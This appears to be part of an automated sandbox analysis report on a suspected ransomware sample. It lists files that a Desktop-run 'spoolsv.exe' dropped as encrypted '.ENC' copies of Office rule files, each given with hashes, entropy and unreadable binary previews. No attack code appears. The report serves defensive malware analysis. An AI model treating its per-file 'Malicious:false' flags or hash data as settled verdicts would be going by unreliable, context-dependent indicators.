                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t.k.$...q.F1..E.fE..l(..JH.....C.9.Bc..i.}..B.7....:..r...fc..5j...&&....{....|.{J.s.._.R..*O..nk:....>....&.dP.l...{".E......T\.K....=.M..,.n..P@.W...L.y<,.P.`..-xg.]..Y.s...E......p.$C.......$0."G.B5..yXC..XdI.0}.G7..H..i.....^Z..|hQ.9{...l.....!..$M0T._..1...7d;V}M.=..G.-.....-H.....#v.AQ.u..Z.Eno..k?..WN.*.....).W..-?.g/.2.W.....UG.\...F........}....W....w5...ppc.r.P..`.....l..".^p.S..GZZA..Ro.....k.....#.H..F....pf...@"r.l^....q]'j&...+...f08F....~>...L.`[.wW....A..4-...j.}....x.t......../.<..)"....7..{...X....m..H{O.>.8pVl.Q..|..R..xD-.~OR.....<.._...p..^qg..."*...s...`.B>....P...f..mX..l..tf|....'.......E..Q...uh,5U.>..YB......z.T...;.~O.U....K..A.d.a.....@cF.....&XI.3....z....@....&.|d,[.V...!.7(P.d..+ ..7..=z!xPN.....$z.i=......;...#?....x1.....}z$.KPv..e8L...F..{. .2..9.R...q..h&."dq.T....6.....{(...Z9k.6.F....uL...<4..\...Sd3.`..W&'... ..B.im...@i.......:..)....T... ...jek..e<.Qbt..P...N..

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule703201v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1408
                                                                                                                                                                                                                                                      Entropy (8bit):7.853302515509288
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:/y5jsgukq1kTppHrBcsTki2evyRUt3pGfdXH5+UrkkOka3+GMpgfI2QHYjLtSlIE:/gsgukqYssTv26yRUtKdJrYjk9GMifuv
                                                                                                                                                                                                                                                      MD5:5E67FE7E20C6E3500E2D5073B084D2E2
                                                                                                                                                                                                                                                      SHA1:15FD3C2DD08568EA39FD6891182133608A02D8E2
                                                                                                                                                                                                                                                      SHA-256:CFEE8D05345FABE19A20E9EE1C43B0E88E00FC2CF1B518922BD34D4EDEB33ACB
                                                                                                                                                                                                                                                      SHA-512:E18B682C13F066EA981C8AC57F9CBB87EF4C9876AB3EF21440C459B0A07C03BA58A799B742F810DE200921B538F68AB5E97CF25347600F7763BA3D0B65EE83FE
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t..krf.-Lnb<.U4.B"J#V.LBr...S...p1.H...B.?...~..._.......:.e.@.....T$...W......N..|..X.ZV=.;..r9>/]"B+Q.....Z/.....*..M......+.4.1<.1*e.....{.b.p..{..`2,[..Z..A.....Z...8o...\3.b.0.5+f.N....t.l.Q...:.j....a^..rR].1.g..0..6..0'....~(..B..n.....`S..$.a..Bbn;t.wR._......a..-OI....N..s.V..p.g..e....O(w........tbl..Y....;.......j..C{X.....*<,.{.......H.}.........i.p......S.....H...X.t..H..g..p.)4..nd'...L...$.....n.O;.y...x.N.../Yc/.1...Z.V8...}.?P.Z.jGc.....6..(..8|..l...L..+....a..W2M..Y.Na...Y.7...^0..s.X.1...........7...N.s[....t.Z.@..7.~.z...K!jF%.8..$nH..K.n....N-.>..;*.W....@.m}.~.]v.o..M.PND.k..`.m..w:4/x..y:.......Q...k;....|...!(2...Hq....f.!.?......3r.$~...r..\.D..@m....4..d..c."...._C.%r.....m...)..........CF.?.V..U_......b>N.Z(..C}M.%...^...&...H.B...l.B].m.B..{f.lt{...a!..q...*..@...wz.m..xj..T..6<G. So.e.G.....B...5...EQ..r.....Y..j]..._..c.X.Q?Qm.8q.....S..o..+...<q.e

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule703250v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1376
                                                                                                                                                                                                                                                      Entropy (8bit):7.849633383680553
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:/0rfB5f6L4awRNpXLFIh/mF3c2kkC08lZ3rAyItjtFaeWYBSkM2oZQqWZ32Rd2:/oJ5iLPGBAOF3kJFlZbAbDFajkez82m
                                                                                                                                                                                                                                                      MD5:554EB1C0BE391745F1337163DC4F35C8
                                                                                                                                                                                                                                                      SHA1:B654EBB0E78B1FA866896B97E205F8F821E5CC96
                                                                                                                                                                                                                                                      SHA-256:2A27F08B0EEAC96971593D99E13B02171D0E28AD52B151AA059F47DFA03525A7
                                                                                                                                                                                                                                                      SHA-512:D7E5080196759F654242E0E077CA054E730755C637D028C3096CC1F82D8D73172441BB9961E1C3B9361D6FCF0155A2D06E1A95AF2F8D6EB0E7D1AE399C317038
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t.....T...4K.o....u..x....`.wN6<..B.=.b..p....b~..sX.....<2~...0.8...68.(6Ui.).^.M.\A.^~....N3.0h.}..N.....Ju...i.....4.}q..v]..$...B.mG....b.@a.R.!e...].r_.Ik.......c.J....'...f.b......';Y..-.>.....b...O64K.7...97.T.....j...gG.....3..R.~..1.B...q_..6.8....*..g......A.....f/..f.2t....{ .By.A.7.0%...~....?...o...|[n..lYd.E.2.trj.W6.Gq.qX.b....n...X=..."P1.%.f.eph..x....F.C...=.....u.3...[S.nz. .,....=.Q.6jg.."4..k.-.....Y.Gc]-$tL....".h...k..@R.o..K..0..y...LA..]..(..G.T.T..y].{.[.'.....(.T....E]......,.s7Mh...Y....PN...........=:]...ef..+.......D..}^y/.p...S..... {.....M.&....L.._.3..(t.?k..^>.6......c.....`.......n....xVj._.}._....=.E._5......&.e..bl.....Y$]...<...y.{"g..z....1.5..V.....7.D6...n...X.....8...)..W..}..'.k.MG}J..C.q.'.s.A.df.....sc.p...Yv....N.ao.S......?.W.5."Em..kZ.Gw.b'dw:........S.M.......x]....+..*C..=-+.BC %xUCw.{a...._.6..;...C.W....N......fLtr......zf....9..NS. .D.*^......Hm\

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule703251v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1408
                                                                                                                                                                                                                                                      Entropy (8bit):7.858349379311268
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:/5Q+x5puGy9v+jwkJxA4ESyZYy4EKS5wLhOrxOnw3VdqKG7kbFEVysa1kNats5sE:/5f0Gav+jwkJ6NSG465wLhOr8+GkbuVd
                                                                                                                                                                                                                                                      MD5:A85844776CD54EE2C4C9720ADDCA499D
                                                                                                                                                                                                                                                      SHA1:6600D83C908EDB82D830814E8A3AE72F330EAB12
                                                                                                                                                                                                                                                      SHA-256:DA47979CE33C32952E526BCEF9A2FD597059115E94955AA59689AD170D0D0BDB
                                                                                                                                                                                                                                                      SHA-512:2039AB2CA705D30A509457AFA9BBACB0BDD205662CBFE86D759787EAAD0AD7687F909687D3FF57472C6ADC1967DFEFF5B75E0540F1142D0845D4F1A796D4AE67
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t...z..U........Q%.=K.m'*......Aq..........+..T,...z..:.@...:..J.?....Z.T*_.....SPn..&..v...0..T.....S8..VA..H...%au..N.'"Xs....D......m..w.~.o.1.NJ.:..-.v.,.}.[.....s. .....r.:..Z^..=./;./<.M....f.Ri8Lm,K....18......D.n.z.y.?..Z.5#...8..o:...yu3.y...]..-..ki..1...l..`.*.q93U.u.Qw.XB}.&f..T..].Tf.w.....?.PO..5..[.Q...q.E.1..3`{M8.......NY.v.z..p^f....Z.GI>\_..B..H..|.%O....S.)7|.>.M.....F.x.-.&.P.C.L:..$..^O1.'h}.H..,...s."....[..7....S....'.KK=4.G.......&..^....E>..c...!F....T..-hc.K.i.._.]..Bn.......Q..7k..0...-s.........Onl..3l...2.......9...?.zu.+..........7.`..W....X....w...6.c..U$...u.#}'Q.O.:A{.....5.P..O/.~w.....%6...u.q.. ..#...vf..j..V%.'..D.;....=.....42^.R......tO...L...(...d1.MuA..`.w..15..;.SO....~.dq:.....?).1..@..%.4...).f..j.aI..I..9i...?B ....KS"..z..H....3.N".....~......Xu.b.]c.6h...M.g! ....R..Y.t._!.....VP..w{....c.Z......%.5?l.G(.x:.V.~.0.A..oQ.../{...r.O..>.....vR.B?.../.l.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule703300v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1392
                                                                                                                                                                                                                                                      Entropy (8bit):7.858687736756983
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:/+pbFJGBjyOJJhmq9i00/Kc8TZMx0w1kIIH5M4Z1lutmUzUwrTN7TNzgiHBIhRAB:/+pbvGkcrmeiVUTkIH5bZruIXoT+8sRu
                                                                                                                                                                                                                                                      MD5:47FCB8E2CD4226D7A3D8DFC57FECA501
                                                                                                                                                                                                                                                      SHA1:02571FC8E1416591CC23374F67A5C04457CADE43
                                                                                                                                                                                                                                                      SHA-256:4979F9E9AC51145C6E82C6AF9CA379AEB169FB8025C3D98A6152C9520827F1FE
                                                                                                                                                                                                                                                      SHA-512:8A168781C413B86138BB8E2118207938F16637D0532653E4F566846913A28B938CB7C1642E103B6C047296F1B232F9760025CB2C9892DE90F3299832117BB488
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t...j.....L..9...Q.h..Q....s..."-...VbU..C.C`Y...P...B.1.K../z....(..B.n.t+~.&........by.2*...HW..5N._....d.........&;...U.Z."...."..o...yd.q...!.v..Ky.....5w....u.V.R..px4....6.T..W}.n]..ZL...iG.I.o.....o..~T.u.D..`..*.~y<.u...K.....?1..2>Z.+....'=R.YS..76.[.S.i$07H..3.~...>.3.^..t[0.d..%(.)~........'{..V.3..j...*.C.....0 .I$|.9.KY..Lr.<...C..+..c...M......ANbi0t....].-P.WR..(.1CCl<@..9...:..,....q|V.....QA...@qP|/..-.E....][...FI.7..P,..,T!m.S...e.Bw3.M.....L!.k.....h.....2l.....SL.{....Q...n.@kY.{P...yf......g~.BF.e.d#......@....H.>.z2...e.......[ ..X..%.@.....RZ.........n<{N....AD.}...N...s....2.:.{......].?)....Q........W.k..........B;D..".D.....j..[M.....{uy.....l{}.A..........R......V.4#.l.E.b.^.R....~.>.%..E.....F..=..e.;.j.J."(.8..*..g..eL,'.u...]....Q\Y\.......F.<.Y.......$..3...y.<..Q.y.-.$....e2<6..edIPYj.(...E....w8f..3..SL.V....T..D8~.w.....~.0..v.A.....x_.......N1(,...Uij.#.W.$NJT

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule703301v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1424
                                                                                                                                                                                                                                                      Entropy (8bit):7.87045640976427
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:/pmB4CE2FVjBAFX70zmQPvZGq/2XcPQVk07nbusRiFt7j8GVRITe7t4mxRO+O2IB:/pEXu7GmQPv4q/2Xc54usAt3vF7t4YjY
                                                                                                                                                                                                                                                      MD5:C2EB7CB6898A3C79D2EBCF3C9F301D27
                                                                                                                                                                                                                                                      SHA1:51EE5B4A18AF93C5F3492D88709FB42527668D07
                                                                                                                                                                                                                                                      SHA-256:AC0401512ABECFC3EE186AD60D1209EED4C6F3387CD921C4FF6B87118170E810
                                                                                                                                                                                                                                                      SHA-512:85D515B016A65CD68EC06ABA3C5B2167696674C4E0EC562451A2B32048144A00E0D2053FC34C1809D34C498A33E980502D80D263C3905FEE7E796C3E803B1BD2
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t.F....m..M.N..Z].nE.j.E....^......Y..][.a..S.6.s.;..+..g0........9..GY.....E*.:....d....z.....ly...:iP.\...(]..f...:=..}...vh........_.m3n.Q.m.....a-....pE..I..Q.e....C..........z:F.?).QV&Q..Y}J..>...H.".$.#...mE.izcM....+..|.^O..w...e.y.x}&<.........V....@.BTPt..rM.....T...{..#..T.'.$.4...6..vu.U...R..~T..9.....N.....).3..s.L.l\....K. F...gUa.k.-t..y.(.R,).>.....)a..fJ.H.s.u...O/.U.m.H.&..w.1.>%H6b.....8........bc"..m..Y.o.]..b1[.....g8.+...r1X.F.@.Y&...X.e......`..6.8.~.n*..j.Xa/s.*H..C....K..].....WC..e...5......3.....<M./2....Bi..[..%.U..]M...[....Z$.....r.}.r..j.XT..xy..Fv...s...z$.....pL.q.p.-.!..m..G.."]...K8.CL......P.J...!.!...P=<..z...Nj..U..R..Z.....?.L...:|..p...........].Q.pX~.yC5n.Q.V.7.....c.7).o.(c.g...B]e....c....$...-..P.......T...A.C1........Zu.n.VQ.*..D..V...m.Z...B..nW..t9}r.Dy.6F.. .s.$.\....4....O(.. ..;(...h.+....;..T.+..D..=I...V...n>&5.y..3<.~.....#[e.:..f.~..IP:gl..36.,n..X..L..

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule703350v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1376
                                                                                                                                                                                                                                                      Entropy (8bit):7.860395284184053
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:/uNGQhruocB0IlocsQzLBy0DiyfulLoBliF23Sag7Op+FvF7gUrYInpTv:/ZQhruoixvByZykNF23oHFqUvt
                                                                                                                                                                                                                                                      MD5:AF684CCB8462C42BF8AA7F6DF8883D66
                                                                                                                                                                                                                                                      SHA1:DBEAAF4151F15A9434B889A7338AB0BA9D198EB2
                                                                                                                                                                                                                                                      SHA-256:A2A7B0A6FCA780964D10A8D9111586C1938710621556A5CC218FF2FCE96190BB
                                                                                                                                                                                                                                                      SHA-512:2411B7B5DCDAC3744B56DADB3D2A12A0255AA27EBD1BFD13D8590C01A1E7CA5F61B8B0E5BE5C0E5BCED12E21DD0A3EC002BEBC387082CF0C616744D05F4A8638
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t.'.F..x.oZ,'g.;(l...D.%....!...w.8.5....W...-h). ...{]...........`-j...........>A.......B..Z.q.s.&:C..wM&\..-..-3..4.......'....+.L8.!0...x..(_...M9...W6!.,.*....."..~U.}6&..z.?.5-.54.G....?K'GF.Z...D.8c....m......Y:5tqK.E......W....,&.f.w.Se.S..N.....y.W......)..#.B.F5].|5....&.....g..C....c.=.%.@.....Sog.p....u..vg.:m.t]..m..D2..Phu..,..k..|;..........b...T......Z....t.....VJQ<!....Q.....-...PLjq..n.Pz..s6..u..';D.....A...3.j...\C.w...cc^P..'N.1.O.b)../.H...eZs.D.z.b..4;{..q....OC)..u$x..PH.H$Y$\.../..v.i..z=_..'.^.}a.....3...&.us.......'x..<[..m$.A....w.f.u..I.5M...<.(v!....s.C.A...H;....G%An*F....sl..E&.q..YI".h[d..k*'J..l..iz;.l..._.e..B..+.. ..1.O.1 .S.7.0..!.[p..9......(Z...$Kv.'V..@..oCKw..[Sh.m.......T.T....6...9..-...a..8...i.6.].....#..d.{m.G...X..?.S.R..;..9.."$.)....2Rz.R....<.?..^7.Q...Y~./.".UjvG............Y.*k...?c.T...EW[.4.5.3.. ....D.7.#>............*z.w....F.....3..cY.. .|^...3.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule703351v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1408
                                                                                                                                                                                                                                                      Entropy (8bit):7.8505977331023304
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:/5XP1BkNRAoDy8ZOkJOKqD1498fDCCALwMbM9bv9pZF5NbQiWcioDn:/5PO28nJO+8fDwLVU3ZFvQi/n
                                                                                                                                                                                                                                                      MD5:AC1A33987A133060B99ACFEAF8E68616
                                                                                                                                                                                                                                                      SHA1:CAFA21B4E2A2EBD754DAF4A6A7833D343AF5255C
                                                                                                                                                                                                                                                      SHA-256:4E8F5067673789C401A45A5FB751C8EABE9DA5A7F53409628000C4932072A35F
                                                                                                                                                                                                                                                      SHA-512:1160A51F2147C5440F02DE9BD4C33DBFD469B2C708229A6565681FF1F5E5C84AEF4A08293B3FF5FEAAD44DF4FE966DA93EF4FC6D9AF9C81349FF2F4C9D7CBF26
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t.....}........y..(C..$..4..>L...V.=..[s/...q.k..m7v`.x.....&z..i...Z....xp......9..w..*..j.P.....?.(L.u.>..c....X....%..w.[1!c Q[!..n......{Y.4....>23..A...#..,....~;S);.....35.&....st.B.z..G.....n..Q3v...._....g.^4...g.u..Y.OqBG...1....=&8..VZ......p.<.+.#.E..s..xz~....i._'. &...41....c..Yte.Z.A...+n..z...a...".<}..+.....&.1.hwE.q......T.h.p....p..U.]7.<...J.1..[v.1v.u.......,...4...B......(.}...l...v.r...V.[.(R.2...2'..c...'.G^{.*....]"6-.]$="..A.&"....*...D-A"(.h.y.t...}.T.`..>i4=B0l...J.g...j.._SG....Va.....T.....J.w#]^-.{......p.E.....7...x.EK.j~....t.>t...^.I..iwNj...C..V..K.q....PD...D..r..^.L.*..)..r9tV:j_.Q..E.[..G1....d.......I...wDz .D..a....-.....k..b.=....7./...6=.....r..|-....|4)..Q...|I.,.HFwS......U.!J.b8.elK6. ....].......K..7...=..}.Ry. .......K.+...4..:1..Ju.y.)......O.wV.5w....o...!...5...G...Ox..FL~...pVxi....b,F....z@...U.t.EsW{.%..w....B....C.8V|....b........}W..~

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule703400v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1392
                                                                                                                                                                                                                                                      Entropy (8bit):7.853715783529771
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:/R1kbaSb9pz/GvzhESkr3MES5NijNo05l8IHjferXSGStgBi+atIHI:/vkbaWpjGv1jkDMES5NijNoUlBerXSKq
                                                                                                                                                                                                                                                      MD5:C57B0DF2F3583C342C5B87DA9F764FF2
                                                                                                                                                                                                                                                      SHA1:9ADDD36CB31C204F6769A7740F6744D60FCF78EB
                                                                                                                                                                                                                                                      SHA-256:0FD7182055ADE5A704761A57C2AEF95BC9372C13657AE5687DAB4186A7CD4287
                                                                                                                                                                                                                                                      SHA-512:C60FC165DB6348BA2C3D2971BB84607EEE848012343BD1E10644311A66EE807C062E33AEA784D932472B03BF8936309B3EFDF0E5B74300D4233CD5A87CDF2F3D
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t..t..p.......'#...5.7......Y..........$.X.x.|o....n.o.%......n...[...../..NpD........f..9.-.B...l....L..N..q...?....'...............!M.*...,Nu-...\.Xt=..!..:.f.).B/...{r.n._....\.7./.PL!a..z....rr..e.EyR....=...h....I.!e.]'.....f..DZb.TRd .0.s..-. .[..rzu..K^..Z.<.1C...8......}n..=V.$...m....,..48../.L]T.`.x....F4.4s..b.t...m.d.k...&mX.V L_M`.l.%v....3........!{..2...K...2Z..^./*.V!.....iM.....4.}.>'Bi#..{,.!w7.....o.'.{gh1...S..[w..l.......r.).:.A...z=.t_`.c(|...8...5.Y.^.......M.x./..:N*..s#Q).ExAc........f.n..S...U..C... .......Q$..W..~F~......d.J<...[.@..(..\.}p..~T....*....tZ...V`.."..%$ve.......=w.^u1..&......h.......(..mMS..d?.G.]S....V..<a..o...W....`C/.R.R...".b.w..c,.Z...x.....`.H..i..).F...}~-U.x..K...c.*.*....e..!..Y.F+..<..7+.c..`...^...7M<...Rj.0..1.QH....h..@o.,....z{....<..3..JTn....j......_.@xp.Y...Y].^`...s.x....1..8.\W~.#|.....8+..A....Q.w&..x.4...M$.....cw..

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule703401v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1440
                                                                                                                                                                                                                                                      Entropy (8bit):7.834116280533916
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:/wtgGWypFSqtZ8YsWQ8GVsFPKbUi2bxzYkpZ5q5KcL9Ftqm6g:/wtgGRpFSqtGGGuPz7Wkpqq8
                                                                                                                                                                                                                                                      MD5:FBBF25990229F96CA6110792CC7ABCD4
                                                                                                                                                                                                                                                      SHA1:59601605BEA7B268490EFB662BCF1D4019A575FA
                                                                                                                                                                                                                                                      SHA-256:67068EA8EB85F27EDB45E0CFFBDB3EFBBE2D686E0B6D34318CAB211132F0B75F
                                                                                                                                                                                                                                                      SHA-512:8AE5C0B3335518C145A2FBD22F3F30F0AFF0DA7038E99C02180195975F08ED1A8C1681A0C0B4A436BD78C5396C631E71016804596387BB38CEED8D026368F7ED
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t..<...9w....Y,.D?...........Q...E#..~.xe...a>.....vZ.m.u3_.|t.=...Fty`AT.^..`...2e........|&I1-.F...R...Gj7...2w.E.+...w. ......~..qX....jq@.P.u.q.X.G.........B.[Mz.q....g.^L."..}#..X...X.....k.....89..p^$FA._y........j0..b(.XOSWJ.>....?(Pw..`.3>PU.p.%@..+...G..l..0C../..U...[U....}6..W..u.k9.J.wNS..K..\...3.C .|w.?.z........E..K...v.....*........FA..L,(...-o..UW..g.4.;.Q0.*...iI&.Z..*.W\V'.G.:.^..*..h..J.$y8. .k..6.[s..)Z7..?.~..Y.H..zb..Xm|....LY..BsL./.[.[W......fO...j(.TjI.t.........q.De.@.o;..&.m..`u4?D......`A...T.i..N.2..-.Q\..|.?mQ.e.......:.....d.K........&...]I\.A.g?......?..4@%b+H.|....j.[x..pH..v..7.c...~.....G..#..z8.H.M.XWwh'..*.-..)S.....V{....N.m..;..... .oZ....4.e~q..#~.z.xF<G..4l..d..F.E....!.1...%..a-..Q..?!DQ.r..P.....IP_.|..eZ..H........-G../D.....(.|O..).6...T.....|..R=.k.bL...'.k.E...J..B4.(.+....$....a.AW$.....#[b.f.bi....#.z.4a.._..St.[..F.......F;w.....X.'.g.A?..?..B

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule703450v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1376
                                                                                                                                                                                                                                                      Entropy (8bit):7.856419726542666
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:/XdDEK5H+KZGWKMo5+vzV5+Xf752cF/yFwwfROxwa5DQdIrspg8fVQ:/XlEKp+KAWXo5W5+DDRw5ww0DyMspgOK
                                                                                                                                                                                                                                                      MD5:0D8978F5C5A6DADB745439EB75527B7D
                                                                                                                                                                                                                                                      SHA1:24799F1CC4723D911462274D41E5ECFC6D535DA1
                                                                                                                                                                                                                                                      SHA-256:FBAA4746CE5D4B21B5A1D26218B488134D0FF1F14EDAD8AE1603AB7FF10588B6
                                                                                                                                                                                                                                                      SHA-512:C001F0F80E258725F0352A5E904BC6D689770FDD50D20A4EF9813DE58AB672DC19A5A95FFB74D5573D9B6710E52A626727653EE44B373CE893080DDE8D4EA80E
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t.....ty...jI......s.I.S..Q{..6..p..1!.b.p..hQ[.L...K.....80.N.L.&..I.qh?\^D.Z.=(......%.OF.T.H....u.gs.p~(..^x*.)./.....BZd.vu...`d...C}.XM.q.H..H,..@<fI..]...J...5.rr{H6z...4.#.Z>..yk..n"...a........5.....&r.`.Xl......6...x.<....Q..e.....iHB...2..B:.o..."...Z.G}...&.....omh..L......O..GGX.....T2.d.........m`..[.8.Ff.Cg/...R.....*..L.3...P...Z}../.."@.X5k#...8<.m.`...x.`..1mi.@.A&..[F.e..ddr.#.T..Yk.0.7t...8K';9.........6.X.'A...@`.j.0-1N...'.ty.E.x}Rz.Ek...1z....f.......;..d...V.x...<.....p.,b,..M.{x.A...^.n....h..u9.u|T....*.........(|.......M.[..@..%.....^ ....y4.=K........**6.c..+!.Q...Tx....E.i..+F..m...e.h.-%.........b....b..p....Su'.s.9"...=.L*.]..Q..k[gA.=......W....mI...F..gQed].U..C~...w'....M...7x#..Kt..H...B.b...v...0s(...F'/.]P.c.JH..].."..]..Vdl..X......t.Q.aV...n..-..r)!.DK.... .<..WJG..v..&b.g0>}eT...01_.....I.a$'Q.....-+....H,/..?....].BS0.B.Q....SO+.Z]..gO."!...E{.)....V.U8..

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule703451v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1424
                                                                                                                                                                                                                                                      Entropy (8bit):7.869610288257728
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:/jaVeiOb04BelVgvFa8fAimMUg2zXAh5/RkJt6EthTwaZBvIgAdycMdM/vsU:/jtrROg2yuY8h0a7mddz/vsU
                                                                                                                                                                                                                                                      MD5:224E7BBA4D58288D6D3FDCCE5A094CD9
                                                                                                                                                                                                                                                      SHA1:0336B2340487CED1FBBDF633656D847BE25024BA
                                                                                                                                                                                                                                                      SHA-256:09319DCD2E635FC75BDDF7ADF7290178C67D8963139EC130B9A3C45A709C9A94
                                                                                                                                                                                                                                                      SHA-512:AE6E5A7ED4F85EF695C48324028D35754363BB486369F9932FBBFA1BDDDB2A203FD4D8A41F3238708ACF8EA6EB85629F3EE68E201A34F193DA33323D6E08321A
                                                                                                                                                                                                                                                      Malicious:false
